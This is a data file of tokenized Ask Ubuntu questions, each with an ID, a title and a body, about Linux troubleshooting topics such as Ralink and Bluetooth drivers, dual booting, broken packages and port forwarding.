rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 04:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 04:00.1 bluetooth : ralink corp. rt3290 bluetooth this is what i have so far can you help me .
375529	shell script to set time and date on ubuntu	my desktop cmos battery is not working , therefore i have to set time and date each time my computer starts up . i want to create a shell script to automate the setting of date and time on my computer after each boot is complete . options that exist include : 1. buying a cmos battery : - am considering this , but for the meantime a shell script will do . 2. using ntp to synchronize time and date with internet servers : - am not connected to the internet .
375531	rtorrent custom event return output	is it possible to run external program from within rtorrent via scripting interface and return output back to rtorrent ? what im trying to do is in .rtorrent.rc i added this line system.method.set_key=event.download.finished , my_action , '' execute=my_shell_script.sh , $ d.get_base_path= '' and this command supposed to execute my_shell_script.sh script and return the output from it , but it does not return the output ! my_shell_script.sh looks like this # ! /bin/sh echo `` new torrent has been downloaded , its path is ' $ 1 ' '' this shell script does gets executed , but shell script output does n't get returned in rtorrent screen session .
375532	usb wont load boot menu ubuntu	just installed ubuntu and am having problems , ca n't update anything and am stuck in terminal , so i need to reinstall . bios is still set to boot from usb but the same usb has been in my cpu and will no longer load boot menu . can someone please help , been trying to get linux working for a few days now .
375535	how to burn a live cd from bootable usb stick ?	iâve a ubuntu 12.04 bootable usb . but i want to keep a live cd of the same . please tell me how to burn a live cd from bootable usb .
375537	bluetooth not working on ubuntu 13.10	i upgrated ubuntu from 13.4 to 13.10 and my bluetooth stopped working . when i open bluetooth i 'm able to put it on but the visibility does n't show anything and did n't detect any device . when i : dmesg | grep blue [ 2.046249 ] usb 3-1 : product : bluetooth v2.0 dongle [ 2.046252 ] usb 3-1 : manufacturer : bluetooth v2.0 [ 15.255710 ] bluetooth : core ver 2.16 [ 15.255748 ] bluetooth : hci device and connection manager initialized [ 15.255759 ] bluetooth : hci socket layer initialized [ 15.255765 ] bluetooth : l2cap socket layer initialized [ 15.255776 ] bluetooth : sco socket layer initialized [ 20.110379 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 20.110386 ] bluetooth : bnep filters : protocol multicast [ 20.110400 ] bluetooth : bnep socket layer initialized [ 20.120635 ] bluetooth : rfcomm tty layer initialized [ 20.120656 ] bluetooth : rfcomm socket layer initialized [ 20.120660 ] bluetooth : rfcomm ver 1.11 when i digit : lsusb bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0bc2:2300 seagate rss llc expansion portable bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 002 : id 0e6a:6001 megawin technology co. , ltd gembird flexible keyboard kb-109f-b-de bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 13ee:0001 mosart bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub when i : hciconfig -a hci0 : type : br/edr bus : usb bd address : 00:1b:10:00:2a : ec acl mtu : 1017:8 sco mtu : 64:0 down rx bytes:457 acl:0 sco:0 events:16 errors:0 tx bytes:68 acl:0 sco:0 commands:16 errors:0 features : 0xff 0xff 0x8d 0xfe 0x9b 0xf9 0x00 0x80 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : link mode : slave accept when i digit : rfkill list 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no when i digit : sudo gedit /etc/bluetooth/main.conf [ general ] # list of plugins that should not be loaded on bluetoothd startup # disableplugins = network , input # default adaper name # % h - substituted for hostname # % d - substituted for adapter id name = % h- % d # default device class . only the major and minor device class bits are # considered . class = 0x000100 # how long to stay in discoverable mode before going back to non-discoverable # the value is in seconds . default is 180 , i.e . 3 minutes . # 0 = disable timer , i.e . stay discoverable forever discoverabletimeout = 0 # how long to stay in pairable mode before going back to non-discoverable # the value is in seconds . default is 0 . # 0 = disable timer , i.e . stay pairable forever pairabletimeout = 0 # use some other page timeout than the controller default one # which is 16384 ( 10 seconds ) . pagetimeout = 8192 # automatic connection for bonded devices driven by platform/user events . # if a platform plugin uses this mechanism , automatic connections will be # enabled during the interval defined below . initially , this feature # intends to be used to establish connections to att channels . autoconnecttimeout = 60 # what value should be assumed for the adapter powered property when # setproperty ( powered , ... ) has n't been called yet . defaults to true initiallypowered = true # remember the previously stored powered state when initializing adapters rememberpowered = false # use vendor id source ( assigner ) , vendor , product and version information for # did profile support . the values are separated by `` : '' and assigner , vid , pid # and version . # possible vendor id source values : bluetooth , usb ( defaults to usb ) # deviceid = bluetooth:1234:5678 : abcd # do reverse service discovery for previously unknown devices that connect to # us . this option is really only needed for qualification since the bite tester # does n't like us doing reverse sdp for some test cases ( though there could in # theory be other useful purposes for this too ) . defaults to true . reverseservicediscovery = true # enable name resolving after inquiry . set it to 'false ' if you do n't need # remote devices name and want shorter discovery cycle . defaults to 'true ' . nameresolving = true # enable runtime persistency of debug link keys . default is false which # makes debug link keys valid only for the duration of the connection # that they were created for . debugkeys = false # enable the gatt functionality . default is false enablegatt = false when i digit : uname -a linux casa-desktop 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux when i digit : lsmod module size used by parport_pc 32701 0 rfcomm 69070 4 bnep 19564 2 ppdev 17671 0 ip6t_reject 12910 1 xt_hl 12521 6 ip6t_rt 13507 3 nf_conntrack_ipv6 18938 9 nf_defrag_ipv6 34616 1 nf_conntrack_ipv6 ipt_reject 12541 1 xt_log 17718 8 xt_limit 12711 11 xt_tcpudp 12884 32 xt_addrtype 12635 4 nf_conntrack_ipv4 15012 9 nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 xt_conntrack 12760 18 ip6table_filter 12815 1 ip6_tables 27025 1 ip6table_filter nf_conntrack_netbios_ns 12665 0 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns nf_nat_ftp 12741 0 nf_nat 26653 1 nf_nat_ftp kvm_amd 59958 0 nf_conntrack_ftp 18608 1 nf_nat_ftp kvm 431315 1 kvm_amd nf_conntrack 91736 8 nf_nat_ftp , nf_conntrack_netbios_ns , nf_nat , xt_conntrack , nf_conntrack_broadcast , nf_conntrack_ftp , nf_conntrack_ipv4 , nf_conntrack_ipv6 iptable_filter 12810 1 crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ip_tables 27239 1 iptable_filter snd_hda_codec_realtek 55704 1 ghash_clmulni_intel 13259 0 aesni_intel 55624 0 aes_x86_64 17131 1 aesni_intel snd_hda_codec_hdmi 41117 1 x_tables 34059 13 ip6table_filter , xt_hl , ip_tables , xt_tcpudp , xt_limit , xt_conntrack , xt_log , iptable_filter , ip6t_rt , ipt_reject , ip6_tables , xt_addrtype , ip6t_reject lrw 13257 1 aesni_intel snd_hda_intel 48171 5 gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel joydev 17377 0 cryptd 20329 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_hda_codec 188738 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel arc4 12608 2 snd_hwdep 13602 1 snd_hda_codec rt2800pci 18690 0 snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel radeon 1402449 3 rt2800lib 79963 1 rt2800pci btusb 28267 0 rt2x00pci 13287 1 rt2800pci rt2x00mmio 13603 1 rt2800pci snd_page_alloc 18710 2 snd_pcm , snd_hda_intel rt2x00lib 55238 4 rt2x00pci , rt2800lib , rt2800pci , rt2x00mmio snd_seq_midi 13324 0 mac80211 596969 3 rt2x00lib , rt2x00pci , rt2800lib snd_seq_midi_event 14899 1 snd_seq_midi ttm 83995 1 radeon snd_rawmidi 30095 1 snd_seq_midi cfg80211 479757 2 mac80211 , rt2x00lib drm_kms_helper 52651 1 radeon snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi bluetooth 371880 12 bnep , btusb , rfcomm microcode 23518 0 eeprom_93cx6 13344 1 rt2800pci snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi crc_ccitt 12707 1 rt2800lib snd_timer 29433 2 snd_pcm , snd_seq snd 69141 21 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi psmouse 97626 0 drm 296739 5 ttm , drm_kms_helper , radeon k10temp 13126 0 soundcore 12680 1 snd serio_raw 13413 0 i2c_algo_bit 13413 1 radeon i2c_piix4 22106 0 video 19318 0 mac_hid 13205 0 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 53014 0 hid 105818 2 hid_generic , usbhid pata_acpi 13038 0 usb_storage 62062 1 r8169 67341 0 sdhci_pci 18985 0 sdhci 42630 1 sdhci_pci mii 13934 1 r8169 pata_atiixp 13242 0 ohci_pci 13561 0 ahci 25819 2 libahci 31898 1 ahci can someone help me ?
375543	problems about the drivers for ralink rt3290 wi-fi adapter	after upgrading to ubuntu 13.10 , ralink rt3290 wi-fi adapter in my laptop dose n't work . so i followed the guide in how do i get a ralink rt3290 wireless card working ? to compile the driver and load it manually . it seemed that the module was loaded successfully , for i got the following outputs : forever41200 @ forever41200 : ~ $ lsmod | grep -in rt3290sta 26 : rt3290sta 1170462 0 forever41200 @ forever41200 : ~ $ modinfo rt3290sta filename : /lib/modules/3.11.0-13-generic/kernel/drivers/net/wireless/rt3290sta.ko version : 2.6.0.0_rev1 srcversion : 3d39532f027115378bdbc79 alias : pci : v00001814d00003290sv*sd*bc*sc*i* depends : vermagic : 3.11.0-13-generic smp mod_unload modversions parm : mac : rt28xx : wireless mac addr ( charp ) but the driver used for ralink rt3290 wi-fi adapter did n't change . it still used `` rt2800pci '' instead of `` rt3290sta '' . forever41200 @ forever41200 : ~ $ sudo lspci -v 02:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie subsystem : foxconn international , inc. device e055 flags : bus master , fast devsel , latency 0 , irq 44 memory at f7d10000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-89-bc-3a-3f-76-b8 kernel driver in use : rt2800pci 02:00.1 bluetooth : ralink corp. rt3290 bluetooth subsystem : foxconn international , inc. device e056 flags : bus master , fast devsel , latency 0 , irq 3 memory at f7d00000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-8a-bc-3a-3f-76-b8 so i add `` rt2800pci '' and `` rt2x00pci '' to blacklist , i had also updated initramfs . but it still did n't use `` rt3290sta '' . it said the wi-fi adapter was using `` rt2860 '' . forever41200 @ forever41200 : ~ $ sudo lspci -v 02:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie subsystem : foxconn international , inc. device e055 flags : bus master , fast devsel , latency 0 , irq 17 memory at f7d10000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-89-bc-3a-3f-76-b8 kernel driver in use : rt2860 02:00.1 bluetooth : ralink corp. rt3290 bluetooth subsystem : foxconn international , inc. device e056 flags : bus master , fast devsel , latency 0 , irq 3 memory at f7d00000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/32 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-8a-bc-3a-3f-76-b8 that 's weird because i ca n't find the `` rt2860 '' module in my system . forever41200 @ forever41200 : ~ $ lsmod | grep -in rt2860 forever41200 @ forever41200 : ~ $ modinfo rt2860 error : module rt2860 not found . then i added `` rt2860 '' to blacklist , however , nothing happened . with the `` rt2860 '' module , the wi-fi adapter do work at first , but a few minutes later the whole linux system crash . error messages i got were : http : //i.stack.imgur.com/n6vs8.jpg it mentioned `` rt3290sta '' , and that makes me more confused about whether the driver in use is `` rt2860 '' or `` rt3290sta '' . by the way , after adding `` rt2800pci '' and `` rt2x00pci '' to blacklist , ralink rt3290 wi-fi adapter was no longer named `` wlan0 '' ; it was named `` ra0 '' .
375545	convey some message to all users	is it possible to write a shell script that enables any user ( may not be root ) to set a message ( e.g . `` download on progress do not turn off '' etc . ) which will be conveyed like pop-up message ( zenity or notify-send ) to all other users . if any user is not there at the time of throwing the message they must get it on login or unlocking their screen .
375549	graphics driver for hp pavilion slimline - s5710f ubuntu 12.04	after installing ubuntu 12.04 , i noticed that no graphics driver has been recognized . i know that this pc is a hp pavilion slimline s5710f and it has an integrated graphics card , which i believe is an radeon 3000 . i did search around and found this : http : //support.amd.com/en-us/download/desktop/legacy ? product=legacy2 & os=linux % 20x86_64 i 'm just not sure what to install . thanks for the help
375552	windows 8 does not load correctly	after installing ubuntu 12.04 the windows system does not boot anymore . i see it in grub and can choose it to start but if so i immediately get a secure boot error and nothing happens further . any suggestions ? thx . f .
375554	regarding ubuntu os installatioon without uninstalling xp	is it possible to run windows xp or 7 and ubuntu side by side ( i.e running both of them ) . if yes , please give a tutorial ( basically video ) .
375556	lubuntu saucy ( 13.10 ) autostart does n't work	i 've followed all the instructions here : how to add startup applications in lubuntu ? the only apps i 'm trying to run with autostart are kupfer and xscreensaver . my lubuntu is n't the desktop version . i started from lubuntu core . since none of the instructions ( from the above link ) worked i 'm guessing that there might be a missing package or something .
375557	change gsettings for other ( all ) users remotelly	i configure several ubuntu 12.04/13.10 computers remotely using cfengine3 . i am wondering how i can add an item to the launcher for all users . i am aware that i need to set com.canonical.unity.launcher favorites , but i do n't know how to do that for all users from a script . i have also seen this post which looks very similar to what i need , only i also want to apply the changes to existing users . how can i do so ? to put it another way : i am wondering how to set launcher items for a ( or all ) users from a script running as root .
375560	ca n't remove my software center	so i was told that sudo apt-get remove software-center would be used to remove software-center , and then i would reinstall it . well , every time i try to remove it i get this : lacy @ lacy : ~ $ sudo apt-get remove software-center e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
375561	move gimp on the top of list in screenshot	when i press prtsc button , in the screenshot dialog , if i choose `` open with '' in appear list , gimp is always on the bottom . is it possible to move on the top ?
375563	how to turn off narrator of ubuntu ?	recently i downloaded ebook speaker applications from ubuntu software center . after that i 'm facing this problem . whatever i type , it keeps on narrating . i do n't which application i 've opened . no application seems to be open . i 've to mute the speaker . any solution ?
375564	no kernel modules were found installing xubuntu from unetbootin	i 'm trying to reinstall xubuntu after a bad install . few questions . in bios install menu what is difference between `` default '' and `` install xubuntu '' ? also , i tried following default install , and i get the error `` no kernel modules were found . this probably is due to a mismatch between the kernal used by this version of the installer and the kernel version of the archive '' - what should i do ? absolute noob here , advise would be heavily appreciated !
375567	how to remove bottom programms bar	i 'm using ubuntu 12.04 . i 've been playing around with compiz settings in compiz settings manager and i messed things up , so in order to go back to default settings i launched as suggested in some threads on this forum : rm -rf .gnome .gnome2 .gconf .gconfd .metacity .cache .dbus .dmrc .mission-control .thumbnails ~/.config/dconf/user ~.compiz* unity -- reset my system works now with unity almost the same way as in the beginning . the only difference is that at the bottom i have a bar with all the programs that are currently launched . how can i get rid of this bar ?
375569	can not burn ubuntu to a cd on macbook pro	i have gone through the instructions carefully . burning the ubuntu-12.10-desktop-amd64+mac.iso file using disk utility , however it keeps failing saying disk is not compatible . i am using dvd+r printable disks .
375571	what is the command to exit the lxpanel menu in lubuntu ?	i recently installed lubuntu 13.10 , and i am in the process of customizing it . i have set super+space as the key-binding for showing the lxpanel menu . i would like to set the same key-binding as exiting the menu . i know for launching the menu , the command is lxpanelctl menu ; but what is the command for exiting the menu once it is shown ?
375572	i have ubuntu 12.04 lts os on my hp probook 445 g1 and i am unable to find options to open and close the optical drive/tray	please help me to open it . i have to install some software on my laptop.i tried to open optical ( cd drive ) drive on my laptop which has ubuntu12.04 lts os on it .
375573	need help with partitions and such dual booting 13.10 w/ windows 7	so i 've spent the past couple days freaking out about this and looking for answers , and i decided to resort to asking on forums . probably should have before i wasted 2 entire days . so i am trying to dual-install ubuntu 13.10 with my x64 windows 7 home premium computer . i have 6 gb of ram , 1tb hard drive , and a 3.3ghz dual core processer ( just in case it matters ) . i 've managed to figure some things out . i 've burned the ubuntu files onto a dvd , and i have been able to successfully run it off the disk . i also shrunk my windows partition by 120gb and partitioned that for ubuntu ( all using the windows disk manager ) . problems : when i turn my computer on with the dvd in the tray , the computer cant find windows . it flashes a screen real quick that says something about not being able to find an operating system , and then goes to `` grub '' and asks what i want to do with ubuntu . this scares me , because i do n't know if that means that i will not be able to boot windows if i install ubuntu . the ubuntu 13.10 installer does not detect my windows operating system . i only have the options to erase everything on my drive , or `` something else . '' i choose that , which brings me to 3 i do n't understand the partition table . i have no idea which drive im selecting to install stuff on , much less which one to select . i tried to tell by the amount of memory partitioned off , but none of the numbers seem to be accurate . plus , all the names are dev/sda ( # ) . i know ubuntu knows the name of my partition , because on the sidebars it shows the names of the different drives , including the partition i made ; so why do n't they use the names ? i have no idea what i 'm going to be erasing . i 've read that i should know which is which by the file system type , but they are all ntfs , including the one i made . my only other option was fat , none for ext2 or any of that like people said to do . my main concerns are that of accidentally erasing windows or not being able to access windows . any feasible solution is helpful , weather it helps me with the install or to make ubuntu see windows . i realize this question has been asked much , but i have found no feasible answers so far . i am relatively new to this , and have never installed an operating system before , so i do not know most of the jargon . please keep it relatively simple , please . i am not a programmer . thanks . edit : so , thanks to several of the comments and my increasing comprehension of linux and installing operating systems from reading lots of articles , i finally managed to install linux . what i had to do is , first , delete the partition i had made on windows . once i deleted it , i put in the boot disk in and ran it . i then proceeded to run gparted by using the buil in search . i found on there the free space from the deleted partition , so i knew where my windows is was not . i then made 3 partitions . 1gb for booting , in case i needed that to make it be able to actually dual boot,6gb for swap , cause i have 6gb of ram , and 110gb for the os storage . then i went to the installer , and this time i was able to tell what was what from the amounts of storage it told me . i selected the appropriate ones , set boot and os to ext4 and swap to the swap type , set it to format what it needed to and set the is mount point to / . i proceeded with the installation and it worked . now i have a new problem , when it boots , it defaults to windows and i ca n't open ubuntu . but i 'll make another topic for that .
375574	ubuntu installation always restarts	i downloaded ubuntu-12.04.3-desktop-amd64.iso and mounted it to usb . i restart my laptop , select install linux and select language , then it says i have no internet , i press `` continue '' , and then i click `` install ubuntu alongside windows 8 '' and click `` continue '' , the computer just restarts and i see the again the same try-ubuntu-or-install-it menu . and hence i can not install ubuntu . i check md5 hash for iso and it 's correct . thanks for any help . p.s . i could n't find answer anywhere else .
375578	can not install ubuntu server because `` install '' option is not available	i am following along this tutorial . i got the bootable usb flash drive made , booted from it and selected my language . the problem is during the next ubuntu install screen . for some reason there is no option to `` install ubuntu server '' or even check cd for defects . only the last three options are available . why are those options not available ? is there a way for me to install ubuntu server ? i 'm trying to install the server on an old acer laptop with 1gb of ram , and 2.2ghz amd processor . also , the only operating system on the local disk is a version of backtrack linux , not sure if thats worth mentioning . also , when i go to the `` memtest '' option , it seems to fail and only reports `` can not load a ramdisk with an old kernel image '' . no idea that means , possibly related ? but yes i was trying both `` universal usb installer '' from pendrivelinux.com as well as unetbootin and both were doing the same exact thing ( no option to actually install the server , just other options ) . i finally found something called `` yumi '' which is also available from pendrivelinux.com . they call it a `` multiboot '' , but i used it just fine to get my single ubuntu server . although now i am getting errors that the grub wo n't install correctly , the endless battle continues : (
375579	asus x550c launch csm blurred out	i have an asus x550c . i have been looking online on how to install ubuntu on it . it says that in the bios i need to enable , launch csm . i tried to enable it but it is blurred out and i ca n't change it from disabled to enabled . how do i un-blur it so i can change it ?
375583	how do i fix my particular broken package system ?	so i 'm having a bit of trouble with my ubuntu 13.10 installation . i can not for the life of me figure out what i did to break it , i think it had something to do with an update not finishing . anyway , when i got to check for updates or try and install a package i get the following errors : updating software : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f installing a package from the repos ( in this case compiz , for the sake of example ) : dj @ thetadome : ~ $ sudo apt-get install compiz [ sudo ] password for dj : reading package lists ... done building dependency tree reading state information ... done compiz is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ca-certificates-java : depends : ca-certificates ( > = 20121114 ) but it is not going to be installed liblwp-protocol-https-perl : depends : ca-certificates but it is not going to be installed libwww-perl : depends : ca-certificates but it is not going to be installed python-httplib2 : depends : ca-certificates but it is not going to be installed python3-httplib2 : depends : ca-certificates but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . this is the result of apt-get -f install : dj @ thetadome : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libc6-i386 use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 20 not upgraded . 2 not fully installed or removed . need to get 183 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ saucy/main ca-certificates all 20130610 [ 183 kb ] fetched 183 kb in 0s ( 262 kb/s ) dpkg : error processing ca-certificates ( -- configure ) : package ca-certificates is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : dependency problems prevent configuration of python3-httplib2 : python3-httplib2 depends on ca-certificates ; however : package ca-certificates is not installed . dpkg : error processing python3-httplib2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : ca-certificates python3-httplib2 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anybody please help me resolve this issue ? i 'd like to troubleshoot through this problem and keep my installation ! what happens when you try to remove one of these packages ? sudo apt-get purge ca-certificates reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ca-certificates-java : depends : ca-certificates ( > = 20121114 ) but it is not going to be installed liblwp-protocol-https-perl : depends : ca-certificates but it is not going to be installed libwww-perl : depends : ca-certificates but it is not going to be installed python-httplib2 : depends : ca-certificates but it is not going to be installed python3-httplib2 : depends : ca-certificates but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
375586	with my x64 windows 7	ciao come faccio a fare un cd di ubuntu auto istallante con brasero poi devo istallarlo in un pc con xp dove vorrei istallare ubuntu e cancellare tutto ( xp compreso ) grazie translation ( using google translate ) : hello how do i make a cd of ubuntu istallante car with brasero then i have to install it in a pc with xp where i want to install ubuntu and delete all ( including xp ) . thanks !
375588	issue scaling with imagemagic -- auto-orient	i am resizing images and painting the background black . when i have a portrait image that as photographed in landscape , the image is scaled and remains in landscape . i want the landscape image to be scaled in portrait . after adding the -- auto-orient option the image scaled correctly in portrait mode . however the image is now cut off at the top and bottom . is this a bug in imagemagic ? here is the command without -- auto-orient convert image.jpg -resize 1024x768 -gravity center -background black -extent 1024x768 newimage.jpg here is the command with -- auto-orient convert image.jpg -auto-orient -resize 1024x768 -gravity center -background black -extent 1024x768 newimage.jpg
375591	system boots in console + login loop ( wrong root and home filesystem permissions )	i messed up my system while trying to fix permission problems for setting up a lamp local server . i tried this solution : how to avoid using sudo when working in /var/www ? without success . then i saw this solution : permissions issue : how can apache access files in my home directory ? i understood that i had to change the permissions of my root directory ( among others ) , so i executed : sudo chmod 710 / i also changed the user group on / to www-data . i also did these operations on /home . i 'm pretty sure one of those commands broke something , because it 's the last commands i executed , and after that , my system showed strange/broken behavior : firefox stopped showing pages some icons got replaced by an red x icon ( meaning `` icon not found '' i guess ) applications refused to launch ( no reaction ) after rebooting : i got a strange graphical message talking about not being able to mount something , asking me if i wanted to wait , and talking about /tmp ( i forgot the message since i was in shock ) my system now boots in console , and when i login , it flashes unsignificant stuff* before re-asking me to login . my important data is on ubuntu one . i 'd prefer not having to reinstall from scratch . is there a way to regain access to my system ? thanks a lot for your help . *looks like a terminal header with the name of the os and other info . does n't seem important .
375594	sockstat not working on 13.10 -- anyone know a fix ?	fresh install of 13.10 . i installed sockstat application . i went to terminal and ran sudo watch sockstat sockstat opens in terminal but there are no connections listed even though i know connections are happening . i opened another terminal tab and ran sudo watch lsof -i -n -p +c 0 and i can see all my connections . netstat also works . why is sockstat not working ? anyone know how to get it working ? sockstat works great on my install of ubuntu 12.04 .
375597	polish kde translation in kubuntu 13.10 ?	how do i install new language in kubuntu 13.10 ? i 've chosen poland as my country but only english language is available . i 've already tried to search for `` kde-l10n '' in muon ( software center ) but it found nothing .
375598	how can i avoid wrecking dell recovery partitions when installing ubuntu ?	newbie here . : - ) i 've tried reading questions and answers about installing ubuntu on a second hard drive , and although i have n't done it yet , it looks straight forward and i expect to install ubuntu onto the second hard drive and leave xp intact on the primary disk . apologies for asking this question as it is very similar to others , but i want to ensure the ubuntu installation is as painless as possible and i do n't want to mess it up . i am nervous about messing up the various pre installed utility and recovery partitions that have been installed on the c drive of my ancient ( but good ) dell dimension 3000 desktop which runs xp home edition . question i want to double check that ( as i understand so far ) in my computer 's scenario , the grub file automatically gets saved on the second partition of the first drive ( which holds the windows xp os . ) is that right ? and is there something i need to watch out for in my scenario ? if i 've missed something here regarding the installation i would appreciate advice before i get stuck in . information drive 0 partitions in order - 39 mb fat 16 primary partition 146 gb ntfs system primary partition ( `` the c drive `` ) 7.84 mb unallocated logical partition 2.75 gb fat 32 primary partition drive 1 ubuntu only ( p.s . the second drive will be 150gb ) thanks in advance anne
375601	shell script for `` intelligent '' copying	i 'm working on a shell script . to the backgroud : i recorded a lot of songs from the radio with my mac . each song is a *.eyetv `` file '' on my mac . actually these `` files '' are just folders , containing a .mpg file with a cryptical filename like 00000000144ad5e9.mpg and some metadata . the recordings are organized in a few folders , each containing like 20 recordings ( an audio cd ) . all these folders are on a nas . i 'm trying to write a script , which creates folders on my mac and then copies the mpgs into them renaming them to the name of their parent directory . directory structure on the nas for the example song `` set fire to the rain '' : /music/recordings1/set fire to the rain - adele.eyetv/00000000144ad5e9.mpg ( and some metadata for eyetv ) desired structure on my hard disc after copying : /home/me/music/recordings1/set fire to the rain.mpg my ( not working ) code so far : dirname= $ ( basename `pwd | tr ' ' '_'`.eyetv ) mkdir ~/musik/ $ dirname find . -name '*.eytv ' | xargs -0 -i cd { } | find . -name ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? .mpg -print0 | xargs -0 -i cp -v { } ~/musik/ $ dirname/ $ ( basename `pwd | tr ' ' '_'`.mpg ) greetings ant thanks in advance , markus
375603	what 's wrong with my picture ?	i do not see my image in libreoffice document appears : image1 libreoffice document+ insert picture from file -- > appears : image 1
375604	radeon kernel module disappeared after upgrade	i recently installed ubuntu 13.10 on my laptop and goes so hot . but it was n't problem , i 'm using the /etc/rc.local script turn off at boot , everything was ok. fine . awesome ! in terms of `` update '' all the system : i used the `` update software app '' and downloaded a total of 147 mb , that includes chromium , mozilla , mesa , grub , xserver and xorg , into others . a reboot request happened and then after clicking and rebooting , a black screen shows up saying that `` the radeon kernel module ca n't be loaded '' or something similar . the login screen appears and i was logged into my desktop and wow ! unity , everything works `` well '' , except that the message `` ubuntu ha tenido un problema '' and other floating window says `` the 3d hardware acceleration is unavailable '' . ok ! it did n't worry me but the temperature goes up ! about 67째c on the radeon card ( using lm-sensors ) and 60째c on the cpu . when i was looking for the /sys/kernel/debug/vgaswitcheroo/switch i recognized it just disappeared . and looking for my devices , only the kernel module of the ivy bridge graphics ../card0/.. was available and the modules of radeon ati ../card1/.. have disappeared . using the software configuration it appears that i 'm using the open radeon driver thames xt . i tried to install the ccc ( catalyst ) , but it failed to load the radeon module too ( this error happened also while installing ) . i rebooted and the pc runs very hot and no unity . i purged it and things got back the last state . i will try to recreate the problem , but it 's gon na take so much time ( my isp sucks ) . on other thing . after wake-up from sleep , the fan runs very loud , this did n't work . so , i fully and clean re-installed ubuntu . my hardware : sony vaio sve14a27cls amd radeon 7670m ( thames xt ) and ivy brigde hd4000 intel core i5 uefi and windows 8 sl with sony special bios control of the keyboard light , fan , assist web vaio buttons and the light sensor .
375608	network manager : percentage	there is a percentage besides a network notification . it is not 100 % . why ? the connection works but i would like to know why that number changes . the notification says : wireless network connection 'the name of my network connection ' active : 'the name of my network connection ' ( 72 % ) i found this information : this being a wireless connection , it 's more likely to be signal strength . typically , that will be measured in db ( which is basically a ratio ) but it 's probably being normalised such that no attenuation = 100 % and no signal = 0 % . do n't expect to see either value as a result . source thanks in advance
375612	ca n't connect to web-server on local host behind nat	i got ubuntu as host . i 'm running a web-server on 192.168.199.8:80 . it is accessible from the local network , but when i 'm trying to reach it by external ip , i go to my router 's web-page . so i arranged port forwarding on router for port 80 to my local ip 192.168.199.8 . unfortunately web-server is still unavailable via external ip . i checked whether the port is open via http : //www.canyouseeme.org/ . as it showed that the port is unavailable , i changed port used to 3659 ( not forget to rearrange port forwarding rule ) . although http : //www.canyouseeme.org/ shows , that the port 3659 is open , i still ca n't reach my web-server . where can the problem be ?
